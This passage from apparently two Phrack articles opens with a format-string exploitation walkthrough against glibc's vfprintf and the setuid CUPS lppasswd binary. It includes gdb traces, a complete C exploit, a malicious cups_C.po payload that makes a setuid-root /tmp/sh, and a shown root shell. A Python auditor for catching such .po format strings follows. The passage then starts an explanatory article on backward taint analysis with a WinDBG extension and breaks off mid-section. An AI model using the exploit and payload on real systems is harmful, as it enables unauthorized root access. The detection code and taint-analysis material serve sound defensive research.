%1$*269145004$x %1073741824$

Breakpoint 1, _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*269145004$x %1073741824$\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:210
210  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) tbreak *(vfprintf+11489)
Temporary breakpoint 2 at 0x1888f1: file vfprintf.c, line 1735.
(gdb) c
Continuing.

Temporary breakpoint 2, 0x001888f1 in _IO_vfprintf_internal (s=0x29f4e0,
format=0xbffeb2dc "%1$*269145004$x %1073741824$\n", ap=0xbffeb2c8 "@\364)")
    at vfprintf.c:1735
1735  in vfprintf.c
(gdb) x/i $pc
=> 0x1888f1 <_IO_vfprintf_internal+11489>:  movl   $0x0,(%ecx,%eax,4)
(gdb) x/wx $ecx+$eax*4
0x29f51c <_IO_2_1_stdout_+60>:  0x00000004
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

This operation has to be repeated for :nargs:. The easiest way to locate
:nargs: is to pick a value you know (0xdeadbeef), and find it on the stack 
or just pick it up where it gets loaded before the alloca code.

%1$*3735928559$x

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Program received signal SIGSEGV, Segmentation fault.
0x0018880f in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*3735928559$x\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1721
1721  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) x/wx $ebp-0x4bc
0xbffeadcc:  0xdeadbeef
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

p/d (0xbffeadcc-$ecx)/4+1
= 472 for me

Disabling both :nargs: and fortify source : [%*472$ %1$*269145004$
%1073741824$]

Well, that's not actually true. It depends on what your buffer looks like.
For example if you attempt to do:

%49150u %4847$hn %*472$ %1$*269145004$ %1073741824$

The first two parameters will cause the stack to shift and the values have 
to be recalculated based on the size of that $hn offset. This gets a bit 
hairy, but with some grunt work you'll be done. The next task is finding
a good way to hijack flow control.

One good vector happens to be a call to free shortly after the %n write.

=> 0xb7d4f3f8 <_IO_vfprintf_internal+2024>:  mov    -0x4bc(%ebp),%edi
=> 0xb7d4f3fe <_IO_vfprintf_internal+2030>:  mov    %edi,(%esp)
=> 0xb7d4f401 <_IO_vfprintf_internal+2033>:  call   0xb7d28988 <free@plt>
=> 0xb7d28988 <free@plt>:  jmp    *0x24(%ebx)
(gdb) x/wx $ebx+0x24
0x29f018:  0x001b8e60

We will overwrite the upper 16-bits to point into the stack
(0x001b->0xbfff).
Write Dest: 0x29f01a

One way to smuggle this value is using a command line argument.

%49150u %4847$hn %*13996$ %1$*269158528$ %1073741824$

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Program received signal SIGSEGV, Segmentation fault.
0x0018880f in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*3735928559$x\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1721
1721  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) x/wx $ebp-0x4bc
0xbffeadcc:  0xdeadbeef
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

So after some finagling you'll reach something like this:

A great improvement would be automation via instrumentation or mapping
out the stack shifting very tightly.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
captain@planet:~/research/fmt/article$ export PAY=`python -c 'print
"\xcc"*4096*20'`
captain@planet:~/research/fmt/article$ (python -c 'print "%49150u %4847$hn
%1$*269168516$x %1$*13996$x %1073741824$"')
                                      | ./a.out `echo -ne "a ccc ddbbb
\x1a\xf0\x29 fffff"`
...
            Trace/breakpoint trap (core dumped)
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%


------------[ B. The real world exploit

===========================================================================
===========================================================================
===========================================================================

CUPS locale() vulnerability.

Ronald Volgers noticed that lppasswd used user-specified locales. A few
distributions (debian, ubuntu, fedora?) ship lppasswd setuid root. Is this
awesome? yes

ls -al lppasswd
-rwsr-xr-x 1 root root 19144 2010-07-07 00:56 lppasswd

To exploit it, you just export LOCALEDIR to a place where 
$LOCALEDIR/C/cups_C.po holds the format strings for the various printfs in 
lppasswd.

This exploit turns out to be hard for a few reasons. The first, it is non
interactive. That is, the format string can not be used for an info leak to
bypass ASLR. The second limitation is that lppasswd creates a LOCK file, so
any weaponized exploit must be highly reliable. Luckily this second one can
be bypassed with resource limits.

File: sploit_filz.c
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include <sys/resource.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/time.h>

int main(int argc, char *argv[])
{
  struct rlimit rara;
  int keke[4096*4];
  char test[0x10000];
  char *args[] = { "./lppasswd", 0 };
  char *env[] = { "LOCALEDIR=./", &keke, test, 0};
  int riri;
  int jmp = 0xbffdc66c;

  memset(test, 0x01, sizeof(test));
  test[0x10000-1] = 0x00;

  for(riri = 0; riri < sizeof(keke)/sizeof(int); riri+=4){
    keke[riri+0] = jmp+2;
    keke[riri+1] = jmp+2;
    keke[riri+2] = jmp;
    keke[riri+3] = jmp;
  }

  rara.rlim_max = rara.rlim_cur = atoi(argv[1]);
  setrlimit(RLIMIT_NOFILE, &rara);

  execve("./lppasswd",args,env);
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

There is also one important difference between the test program and 
lppasswd. The vulnerability inside libcups is triggered by vsnprintf. 
Internally, vsnprintf creates a fake file stream pointer on the stack and 
then passes it to vfprintf.

This is actually pretty good news in terms of bypassing ASLR as the file
stream pointer is a fixed offset from the format string structures, which 
glibc allocates on the stack.

The vulnerable function in libcups follows.

File: cups/cups/langprintf.c
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
int          /* O - Number of bytes written */
_cupsLangPrintf(FILE        *fp,  /* I - File to write to */
          const char  *message,  /* I - Message string to use */
          ...)      /* I - Additional arguments as needed */
{

...

  va_start(ap, message);
  vsnprintf(buffer, sizeof(buffer),
            _cupsLangString(cg->lang_default, message), ap);
  va_end(ap);
..
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

With ASLR disabled, the best option is to go after the return address. In 
the callstack for vfprintf:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Breakpoint 1, _IO_vfprintf_internal (s=0xbffdc68c,
    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; %49150u
%7352$hx %49150u %7353$hx %14263u %7352$hn %27249u %7353$hn %1$*14951$x
%1$*14620$x %1073741824$", ap=0xbffdefe8 "\243>\344\267-\021\021") at
vfprintf.c:210
210  in vfprintf.c
(gdb) bt
#0  _IO_vfprintf_internal (s=0xbffdc68c,
    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; ...
#1  0xb7df2bf4 in ___vsnprintf_chk (s=0xbffde7bc "", maxlen=2048, flags=1,
    slen=2048,
    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; ....
#2  0xb7f96544 in vsnprintf (fp=0xb7e68580,
    message=0x1117c5 "lppasswd: Unable to open password file: %s\n")
    at /usr/include/bits/stdio2.h:78
#3  _cupsLangPrintf (fp=0xb7e68580,
    message=0x1117c5 "lppasswd: Unable to open password file: %s\n")
    at langprintf.c:125
#4  0x0011116a in main (argc=1, argv=0xbffdfee4) at lppasswd.c:316
(gdb)
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The second return address lends itself very well to exploitation. The 2nd
parameter points to user input. This is highly useful when overwriting the 
saved return address.
The address can be pointed to &system or __libc_system or do_system, and 
the old 2nd argument will become the argument to system.

Above in the resource limit setting code, the environment is filled with
pointers to that return address:  int jmp = 0xbffdc66c;

    keke[riri+0] = jmp+2;
    keke[riri+1] = jmp+2;
    keke[riri+2] = jmp;
    keke[riri+3] = jmp;

NX Bypass: C/cups_C.po
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
msgid "lppasswd: Unable to open password file: %s\n"
msgstr "chown root:root /tmp/sh; chmod 4755 /tmp/sh; %49150u %7352$hx
%49150u \
%7353$hx %14263u %7352$hn %27249u %7353$hn %1$*14951$x %1$*14620$x
%1073741824$"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The first part executes a command. The next 4 arguments were padding but
removing them would have required some recalculations.

These two writes redirect control flow to system by overwriting the least
and most significant half-words of the saved return address.

%14263u %7352$hn %27249u %7353$hn

And the last part is used to bypass FORTIFY_SOURCE:  
%1$*14951$x %1$*14620$x %1073741824$.

Overall, things are pretty hairy, but they work with some massaging.

captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -l lppasswd
-rwsr-xr-x 1 root root 18867 2010-06-06 01:26 lppasswd
captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -al /tmp/sh
ls: cannot access /tmp/sh: No such file or directory
captain@planet:~/research/fmt/cups-1.4.2/systemv$ cp /bin/bash /tmp/sh
captain@planet:~/research/fmt/cups-1.4.2/systemv$ gcc -o sf sploit_filz.c
sploit_filz.c: In function ‘main’:
sploit_filz.c:13: warning: initialization from incompatible pointer type
sploit_filz.c:20: warning: incompatible implicit declaration of built-in
function ‘memset’
captain@planet:~/research/fmt/cups-1.4.2/systemv$ ./sf 4
Enter old password:
Enter password:
Enter password again:
sh: %49150u: not found
Segmentation fault
captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -al /tmp/sh
-rwsr-xr-x 1 root root 818232 2010-07-07 01:26 /tmp/sh
captain@planet:~/research/fmt/cups-1.4.2/systemv$ /tmp/sh -p
sh-4.1# id
uid=1337(captain) gid=1337(captain) euid=0(root)
groups=4(adm),20(dialout),24(cdrom),29(audio),30(dip),44(video),46(plugdev)
,104(lpadmin),112(netdev),115(admin),118(pulse-access),120(sambashare),
1000(captain)
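
Seen from the defender's side, the cups_C.po entry above is easy to reject before it reaches vsnprintf: a translation may reorder the arguments its msgid declares, but it has no reason to add %n, reference arguments the msgid never passes, or leave a directive unfinished. The following is an added example (Python, not from the original article and not CUPS code) that audits msgid/msgstr pairs for those deviations; the function names, problem codes and sample catalog are assumptions made for illustration.

```python
import re

# %[N$][flags][width][.precision][length]conversion, as printf parses it
DIRECTIVE = re.compile(
    r"%(?:(?P<pos>\d+)\$)?[-+ #0']*"
    r"(?P<width>\*(?:\d+\$)?|\d+)?"
    r"(?:\.(?P<prec>\*(?:\d+\$)?|\d+))?"
    r"(?P<length>hh|h|ll|l|L|q|j|z|t)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)


def arg_usage(fmt):
    """Return ({(arg_index, type)}, {problem codes}) for one format string."""
    used, problems, seq, i = set(), set(), 0, 0
    numbered = unnumbered = False
    while (i := fmt.find("%", i)) >= 0:
        m = DIRECTIVE.match(fmt, i)
        if m is None:                    # e.g. "%1073741824$": no conversion
            problems.add("incomplete-directive")
            i += 1
            continue
        i = m.end()
        conv = m.group("conv")
        if conv == "%":                  # literal percent sign, no argument
            continue
        if conv == "n":
            problems.add("write-directive")
        refs = []                        # (explicit index or None, type)
        for star in (m.group("width"), m.group("prec")):
            if star and star.startswith("*"):   # '*' consumes an int argument
                refs.append((star[1:-1] if star.endswith("$") else None, "int"))
        refs.append((m.group("pos"), (m.group("length") or "") + conv))
        for explicit, typ in refs:
            if explicit is None:
                seq += 1
                unnumbered = True
                used.add((seq, typ))
            else:
                numbered = True
                used.add((int(explicit), typ))
    if numbered and unnumbered:          # undefined behaviour per POSIX
        problems.add("mixed-numbering")
    return used, problems


def audit_pair(msgid, msgstr):
    """Sorted codes describing how msgstr's directives deviate from msgid's."""
    want, _ = arg_usage(msgid)
    got, problems = arg_usage(msgstr)
    nargs = max((idx for idx, _ in want), default=0)
    for idx, typ in got:
        if idx > nargs:
            problems.add("arg-out-of-range")
        elif (idx, typ) not in want:
            problems.add("type-mismatch")
    return sorted(problems)


def unquote(fragment):
    """Decode the C-style escapes of one quoted .po string fragment."""
    body = fragment.strip()[1:-1]
    return re.sub(r"\\(.)",
                  lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)),
                  body)


def parse_po(text):
    """Yield (msgid, msgstr) pairs, joining multi-line continuation strings."""
    entry, field = {}, None
    for line in text.splitlines() + ['msgid ""']:   # sentinel flushes last entry
        line = line.strip()
        if line.startswith("msgid "):
            if entry.get("msgid"):
                yield entry["msgid"], entry.get("msgstr", "")
            entry, field, line = {"msgid": ""}, "msgid", line[6:]
        elif line.startswith("msgstr "):
            field, line = "msgstr", line[7:]
            entry["msgstr"] = ""
        if field and line.startswith('"'):
            entry[field] += unquote(line)


def audit_catalog(po_text):
    """Map each msgid whose translation deviates to its problem codes."""
    report = {}
    for msgid, msgstr in parse_po(po_text):
        codes = audit_pair(msgid, msgstr)
        if codes:
            report[msgid] = codes
    return report


# Constructed sample catalog. The last msgstr reuses the directive portion of
# the cups_C.po entry shown above; the first two are ordinary translations.
SAMPLE_PO = r'''
msgid "Enter password:"
msgstr "Mot de passe :"

msgid "%s on %s\n"
msgstr "%2$s sur %1$s\n"

msgid "lppasswd: Unable to open password file: %s\n"
msgstr "%49150u %7352$hx %49150u "
"%7353$hx %14263u %7352$hn %27249u %7353$hn %1$*14951$x %1$*14620$x "
"%1073741824$"
'''

if __name__ == "__main__":
    for msgid, codes in audit_catalog(SAMPLE_PO).items():
        print(repr(msgid), codes)
```

The legitimate reordering in the second entry passes, which is why the check compares argument maps rather than banning positional directives outright.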


------------[ C. TODO- ASLR

The author has failed to make an ultra reliable exploit for defeating both
ASLR and an NX stack. Part of what makes it difficult is all of the moving
parts.

In this case ASLR makes things hairy for two reasons. Both the stack and 
libc (and the text) are shifting. They are randomly offset from each other.
In the above exploit, two values need to be known. The first is the 
location of the saved return address. The second is the address of glibc. 
By applying the resource limits, it is still possible to brute force this 
vulnerability, but it requires patience with 24-bits of entropy.

Anyway, the following two methods have been attempted.

1) Copy (read+write) primitive using width arguments.

The width argument can be used to read a value from memory and write it
somewhere.

%1$*100$u will read the 100th argument's value, and write that many spaces.
This is presumably the reason why %n was introduced in the first place. The
copy would look like this:

%1$*100$u %2$101$n

Author's Verdict: Too hairy
The copy write primitive does not seem to work reliably under the fortify
source loss of state. Exact reasons have not been yet determined, and a way
to stabilize them may exist. In addition, once a copy operation is 
performed, the internal printf counter must be reset by writing a value 
numerous times. The easiest way to do this would be to print out the same 
value '256' times and reduce write width to one-character at a time. 
Writing the same value '256' times ensures that the lowest byte of the 
internal counter will be 0.

2) Repurpose double stack pointers

For lppasswd, stack double-pointers exist that can be repurposed. For %n to
work, a pointer is needed. The idea behind this avenue is to use the first 
pointer to redirect the second pointer to the return address.

Author's verdict: Using the pointers is reliable, but ASLR has enough 
entropy that the correct offset to the return address is unreliable. The 
best achievement was 24-bits of entropy, 12-bits for the return address and
12-bits for &system. Only one exploit seemed to work, and the author was 
unable to reproduce even after a night of testing.

===========================================================================

------[ 4. Afterword

It is the author's opinion that it is quite amazing vfprintf even compiles
in the first place. Briefly, it should be noted that there are more angles 
of attack in the vfprintf code that are a bit more complicated, although 
quite messy. Here is one example: if a target is using the deprecated 
features of vfprintf to register their own format string specifiers, an 
attacker can get arbitrary code execution without needing %n. Execution 
without %n may even be possible with the jump table implementations...

This article is dedicated to runixd and beist, the top scoring two of the
first three loller skaterz. Mad greetz to the even better lollerskaterz 
dropping from rofl copters. Surf the chaos dudes!

Many thanks to the phrack staff for their help.
And also real hackers who make me blush.

Thanks for reading. Have phun!

[0] http://msdn.microsoft.com/en-us/library/ms175782.aspx
[1] http://www.securityfocus.com/bid/1634
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0393
[3] http://www.phrack.org/issues.html?issue=59&id=7&mode=txt
[4] http://www.phrack.org/issues.html?issue=63&id=14
[5] http://althing.cs.dartmouth.edu/local/formats-teso.html
[6] http://www.loko.nu/formatstring/format_string.htm


--------------------------------------------------------------------------------


                             ===Phrack Inc.==

		Volume 0x0e, Issue 0x43, Phile #0x0a of 0x10

|=----------------------------------------------------------------------=|
|=-------=[ Dynamic Program Analysis and Software Exploitation ]=-------=|
|=---------------=[ From the crash to the exploit code ]=---------------=|
|=----------------------------------------------------------------------=|
|=----------------------------------------------------------------------=|
|=---------------=[ By BSDaemon                              ]=---------=|
|=---------------=[ <bsdaemon *noSPAM* risesecurity_org>     ]=---------=|
|=----------------------------------------------------------------------=|
|=-------------------------=[ August 14 2010  ]=------------------------=|
|=----------------------------------------------------------------------=|

        "Don't matter what do you believe happens when someone dies,
         the life always continues through the others who remember."
                                Md. Sergio da Silva Branco
                                Beloved father and my hero.  God bless you!


------[  Index

  0 - Abstract
    0.1 - Keywords

  1 - Introduction
    1.1 - Paper structure

  2 - Concepts and Additions 
    2.1 - Taint Analysis
	2.1.1 - Taint Sources
	2.1.2 - Intermediate Languages and Tainted Sources
	2.1.3 - Explosion of watched data
    2.2 - Backward Taint Analysis
	2.2.1 - From the crash to the exploit

  3 - Existent solutions and comparisons

  4 - Future and other uses

  5 - Acknowledgements

  6 - References

  7 - Sources 

------[ 0 - Abstract

This article provides a compilation of the state of the art in program
analysis, a real implementation based on an extension to the Microsoft 
Debugger for tracing and a GUI application to actually do such 
analysis and help determine not just if something is exploitable, but
actually to guide you in such exploitation process.  It uses backward taint
analysis to map from the crash back to the original data and define what 
part of the data crashed the application, and how such data was transformed
during the execution.

It does not discuss how to create a Microsoft Debugger extension, and is not 
even going to cite anything related to that.  It is all about software 
exploitation, so I completely ignore other motivations for program analysis 
(although I know those motivations are really important too).  A deep
understanding of software exploitation is required in order to really take 
advantage of such a tool.


------[ 0.1 - Keywords

Dynamic Analysis, Taint Analysis, Data Flow, Intermediate Language, Reverse 
Engineering, Software Exploitation.

------[ 1 - Introduction

Program Analysis is a hot topic.  Many people are discussing this subject 
even more given the amazing numbers of crashes the fuzzers are finding
nowadays [1] [2].

This article uses program analysis as the way of making a computational
system reason automatically (or at least with little human assistance)
about the behavior of a program and draw conclusions that are somehow
useful.

In a world where thousands of crashes do exist and are easily found in very
important software, the classification of exploitability of such bugs is 
the first priority.  It is known that it is impossible (or infeasible or 
nobody wants to, or whatever other excuse you find to not fix your 
software) to fix all the bugs such fuzzers are finding, so, at least, 
companies want to fix (or exploit) the ones that are exploitable.

The problem is that the only available solution to analyze such crashes is
provided by Microsoft (named !exploitable or bang exploitable) [3][4] and 
is not really useful to create actual exploits or to better understand the
problem, but just to give a static classification (exploitable, probably
exploitable, not exploitable or unknown).

Even people with source code access are sometimes relying on such tools to 
determine the exploitability of a given path (sometimes it is easier to 
analyze a bug without getting into the messy code structure).

Taint Analysis concepts and challenges are going to be explained in order 
to determine what is being done by the proposed solution and to provide a 
better idea of the future and areas of improvement.

---[ 1.1 - Paper structure

In Chapter 2 I discuss the concepts needed in the solution, like what
is program flow analysis, taint analysis, what are the taint sources that 
can be used and how to map between the assembly code and the taint places 
in order to propagate the taint.  Also in this chapter I talk about the 
explosion of watched data when you are tainting from the beginning of the 
execution and why backward taint analysis is the solution for this problem.

Chapter 3 compares the provided solution with the Microsoft !exploitable 
software. 

Chapter 4 defines the future of this area and some expected improvements in
the future.   

Chapter 5 is the acknowledgements to everybody who contributed 
directly or indirectly to this article.  

Chapter 6 includes the references and some additional references (not 
directly cited in the article, but very useful to learn more) and, finally,
Chapter 7 is the most juicy part and includes all the sources for two 
different projects (the Microsoft Debugger extension which is the main 
focus of this article and a HeapMonitor for Linux-ARM that I also comment
on in this paper).

------[ 2 - Concepts and Additions

This is the core of the article and will give the state-of-the-art in 
program analysis focusing on software exploitation.  Here I discuss
all the challenges in this area and all the concepts needed in order to
understand the attached code (Section 7).

Vulnerability exploitation experience is not required to understand this
particular section.  Vulnerability exploitation experience is mandatory
to actually use the offered solution, since the implementation only helps
the analysis process, and does so by automating the validation of what
the attacker controls that influences a crash and what the code traces
to get to the crash point are.

---[ 2.1 - Taint Analysis

Taint Analysis is one kind of program flow analysis and the idea behind 
such analysis of a program flow in the context of this article is to define
the influence of external data over the analyzed application.

Since the information flows, or as usually said, is copied to or influences
other data, there is a need to follow this influence in order to determine
the control over specific data (registers, memory locations).  This is a
requirement to later determine the exploitability.

To follow the information flow, I need to keep track over all the taint
sources, and propagate such tracking to influenced data.

That means that when a tainted location is used in such a way that a value
of other data is derived from the tainted data (like in mathematical
operations, move instructions and others) I need to mark the other location
as tainted as well.  This is called taint propagation and is defined with 
the following transitive relation:

	- If information A is used to derive information B:
		A->t(B) -> Direct flow
	- If B is used to derive information C: 
		B->t(C) -> Direct flow
	- Thus: A->t(C) -> Indirect flow

These transitive steps between operations are called 'flows' and can be 
analyzed one by one or in a block (like in the example above, A->t(C)).  

A location is defined as:

	- A memory address and size

	- A register name (for the implementation a register is considered 
	  entirely, not making differences regarding %eax and %al for 
	  example). This means that, when defining a register, I set 
	  it higher (e.g: setting %al as tainted will also taint %eax) 
          and clearing will clear it lower.  Care must be taken, since
	  when defining %al, %ah is not set. 

To keep track over bit operations in a register, it is important to taint 
the code-block level of a control flow graph [5].  This adds extra 
complexity, since there is the flow graph and the data flow dependencies 
graph.  The dependencies graph represents the influence of a source data
to the operation being performed.

In the implementation provided with this article, the WinDBG extension will
normalize the operations, saving the used values for later inspection by 
the GUI application.  This provides a great view over the tainted data.


---[ 2.1.1 - Taint Sources

Any information that is considered untrusted is tainted.

Untrusted, for the scope of this article, is the information considered in
control of the attacker.  There is also a transitive relation when dealing
with tainted data, where any untainted data that receives values from a
tainted source becomes tainted. 

This includes information received from the network, or read from the 
disk (in case of client-side exploits, for example).

The more tainted information, the bigger the propagation and the required
resources in order to keep track of that.  In fuzzing situations, where
taint data is used to feedback the program behavior, even server-side
configurations can be marked as tainted (in order to avoid the need to test
server software with multiple different configurations [22]).

Taint is removed from a location only when it receives an assignment from an
untainted source or an assignment from a taint source resulting in a constant
value not controlled by the attacker.  Most instructions in a program will not
untaint the data, thus usually the amount of tainted data grows during the
program analysis.

The example above is an explicit flow, since the defined value will receive
the used tainted value independently of any conditions.

When there are conditions for the flow, this is called an implicit flow,
like in the following example:

	if (x == 1) y=0;

As I'll analyze in section 2.2, conditional statements need a special analysis
approach, and in the offered tool this is done in the analysis part 
(the WinDBG extension). 

Two special situations to track are partial tainting (when the untrusted 
source doesn't completely control the tainted data) and tainting merge 
(when there are two different untrusted sources being used to derive some
data).  In a merge, the result is tainted. 

A data area is 'used' when it is referenced by an operation and is
'defined' when the data is modified.  

Instructions that are pure assignments are easy to track, since if a 
tainted location is used to define another location, this new location will
also be tainted.

Operations over strings are tainted when:

	- They are used to calculate string sizes using a tainted location
		E.g:  a = strlen(tainted(string));

		Since string is tainted, I assume the attacker also controls
		the value of a.  

	- Search for some specific char using a tainted location, defining
	  a flag if found or not found. 

		E.g.:	pointer = strchr(tainted(string), some_char);
	
			if (pointer) flag=1;

		Since the string is tainted, I assume the attacker also 
		partially controls the flag.  The same happens if the
		attacker controls the some_char value.
				
Arithmetical instructions with at least one used tainted data usually 
define tainted results, since the attacker at least partially controls the 
result.  
Those instructions can be simplified using intermediate languages to map to
boolean operations, and then the following rules apply:

Or truth table:
 
X	Y	X or Y	   
0	0	0	   
0	1	1	   
1	0	1	   
1	1	1	


And truth table:
 
X	Y	X and Y	   
0	0	0	   
0	1	0	   
1	0	0	   
1	1	1	 

Xor truth table:
 
X	Y	X xor Y	   
0	0	0	   
0	1	1	   
1	0	1	   
1	1	0	 

Assuming there is at least one used tainted data:

	- In the situation where I have an or operation, if the used 
	  untainted data is 1, I know that I don't define the result of the
	  operation, so I untaint the result.  If it is 0, I know that 
	  whatever value I define for the tainted data, the same value will
	  be defined for the used target of the operation, meaning that the
	  result is tainted.

	- When I have the and operation, on the other hand, if the used 
	  untainted data register is 0, I know that I can't define the 
	  result, and hence I untaint the data.  If the used untainted data
	  is 1, I completely define the result, so it is tainted.

	- XORs have a special situation where the value is XORed with 
	  itself. This is the only case where a used tainted data will 
	  define an untainted result (0).

It is also a good idea to keep track of the EFLAGS register when the 
attacker is able to define the value, considering it tainted (this is later
used to determine the influence over flow operations).

Conditional branches are taken care of in the implementation using the 
tracing analysis generated by the WinDBG plugin. Single-stepping is used for
the tracing.  WinDBG provides the disassembled opcode for the current 
instruction and it is parsed to keep track of the tainted data.

To solve a limitation of the tool, which is to consider cases not created 
by the original crash data, one must analyze conditional jumps and flag 
registers carefully:

	- If the attacker can define the EFLAGS, and a jump is dependent on
	  a flag, the attacker controls the branch decision (this is 
	  considered by !exploitable as unknown, since it creates lots of 
	  different possibilities - simply controlling EIP is not enough to
	  define exploitability, since some control over the memory 
	  location pointed by the EIP is also a requirement).  Ret-into-lib
	  depends on control over the arguments, and ROP approaches require
	  control over multiple returns to create all the required gadgets.

	- Control over a branch decision means tainted EIP, since the 
	  attacker at least partially controls the flow of execution

	- To consider the value of EIP, one must define:
		* The address if the jump is taken
		* The address of the next instruction (if the jump is not 
	     	  taken)
		* The value of the interesting flag register (0 or 1)
		* Then:  %eip<-(address of the next instruction) +  value 
		  of the flag register * (|address if the jump is taken - 
		  address of the next instruction|)

The above formula makes it possible to expand the taint over code flow 
blocks, solving the actual limitation of defining if a specific code block 
is under attacker control (instead of a specific destination with the 
actual input that generates the crash), but it also exponentially grows the 
complexity of keeping track.  

Researchers are creative, and so there are many other uses for taint
analysis, like identifying how long sensitive data is kept in the system [6] 
and/or formally defining a secure information flow [7].


---[ 2.1.2 - Intermediate Languages and Tainted Sources

In order to keep track of the tainted sources and propagate the taint, it
is critical to have a program analysis that will understand the target
program language semantics.

Tools exist to implement taint analysis in high-level languages, such as
C++ and Java [7][8][9], but this article focuses on straight assembly code 
analysis.  I also recommend reading about symbolic execution [9][10] and 
SAT Solvers [11][12][13] since this has a close relation with the subject.

The classic approach is to use an intermediate language to represent the
program instructions.  This improves the code quality and helps in
portability.

There are many good references in that area, so I'm just going to recommend
some [14][15][16] and say that I use the WinDBG api directly, which is not
the best approach when thinking of portability, but was the fastest to 
code. 

The WinDBG extensions are DLLs loaded by the debugger using LoadLibrary and 
run in the context of the debugger process.  Those extensions are trusted
by the debugger.  The debugger tries to handle access violations, but heap
corruptions in the extension itself will likely crash the debugger.

All the debugger extensions can make calls to the Win32 API and to the
debugger interfaces (dbgeng.dll).

What is more interesting is the fact that the debugger API will try to
abstract the type/version of the target, which means you can write
extensions that will work on a live debugging session or in a dump file
equally.  The same applies for user-mode/kernel-mode targets.

The two main types of extension APIs for WinDBG are:
	- WdbgExts -> The old debugger extension interface, which has many
	  limitations for symbol and type lookups 
	- DbgEng -> The new debugger interface, which the attached project
	  is based on.  Offers an interface for everything that can be
	  performed by the debugger

DbgEng extension API is exposed through the dbgeng.dll and offers the
capability to create new standalone tools that call the interface.  Some of
the functionalities supported:
	- Get current thread/process information
	- Read/Write memory
	- Symbol/type lookup

To call the extension functions, one needs to first create the debug
interface objects and then call the interface exposed by these objects.

An extension using the DbgEng must export the DebugExtensionInitialize entry
point, and optionally export the DebugExtensionNotify and
DebugExtensionUninitialize entry points.

As previously explained, the debugger will LoadLibrary() the extension dll
and then will use the GetProcAddress() to find the entry point.

From the attached code:
	HRESULT
	CALLBACK
	DebugExtensionInitialize(
		OUT PULONG Version,
		OUT PULONG Flags
	)

This is the mandatory entry point which will be called when the extension
is loaded.  This function gets new debugger interfaces by calling in the
code:
	if ((Hr = DebugCreate(__uuidof(IDebugClient),
				(void **)&DebugClient)) != S_OK)
	...
	
	if ((Hr = DebugClient->QueryInterface(__uuidof(IDebugControl),
				(void **)&DebugControl)) != S_OK)

The optional: 
	void
	DebugExtensionNotify(
		OUT ULONG Notify,
		OUT ULONG64 Argument
	)

Is called when the target is connected/disconnected and is not used in the
code.  The DebugExtensionUninitialize is called when the extension is
unloaded and can perform cleanup routines.

In the attached code:
	HRESULT
	CALLBACK
	vdt_trace(PDEBUG_CLIENT Client, PCSTR args)

is the debugger extension command (called from the debugger using
!vdt_trace).  The args parameter is the command line argument string passed
to the extension.

The API is very rich in getting process information and I strongly
recommend the reader to have a look into the source code at this point.


---[ 2.1.3 - Explosion of Watched Data

Anybody who has worked with taint propagation knows that the biggest 
problem is how to keep track of all the data.

In this case, I need at least to:

	- Identify all the instructions and their operands
	- Define what are the source, destination and other impacted
	  registers (some projects don't keep track of affected registers,
	  like the comparison flags in EFLAGS [6])
	- Mark all the tainted data
	- Understand what each instruction does

It is easy to see that keeping track of all this information is quite
performance-intensive, even more so when decisions need to be made and
followed.

There are implicit and explicit operands for instructions, and it is
necessary to support all the situations (otherwise, track of some
important tainted data is lost).

A good example [5] is a simple push %eax operation:
	
	- Explicit operand: %eax register
	- Implicit operands: %esp and ss
	- Semantic:  %esp<-%esp-4	(subtraction)
		     ss:[%esp]<-%eax	(move)

As explained, this is treated by the intermediate language. I need to keep
track of the base memory areas, their size and the register names (keeping
bitwise information - as opposed to byte-level [21] - is better to avoid
false positives, but is prone to easily explode the amount of data
collected).

Boolean operations receive special treatment as well, since some boolean
